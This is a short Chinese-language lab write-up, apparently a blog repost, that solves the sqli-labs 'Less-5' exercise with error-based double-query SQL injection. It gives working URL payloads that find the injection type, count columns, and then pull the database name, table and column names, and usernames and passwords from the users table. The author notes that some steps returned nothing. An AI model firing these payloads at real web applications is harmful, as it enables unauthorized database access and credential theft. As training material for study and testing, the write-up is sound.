Less-5-02
阿新 • • 發佈:2020-08-14
0x01判斷注入型別
字元型_單引號_雙注入
?id=1
?id=1'
?id=1"
單引號字元型注入,1,3顯示youarein,2單引號報錯
0x02 判斷欄位數
?id=1'order by 3--+
#欄位數為3
?id=-1' union select 1,2,3--+
#無回顯
0x03 雙注入判斷資料庫名
?id=-1' union select 1,count(*),concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a--+ #得到資料庫名為security
0x04 判斷表名
?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2)) as a from information_schema.tables group by a--+
#未知原因不顯示錶名
0x05 判斷列名
?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(column_name) from information_schema.columns where table_name='users'),floor(rand()*2)) as a from information_schema.tables group by a--+ #未顯示類名
0x06得到資料
?id=-1' union select 1,count(*),concat_ws('-',(select concat_ws('-',id,username,password) from users limit 0,1),floor(rand()*2)) as a from information_schema.columns group by a--+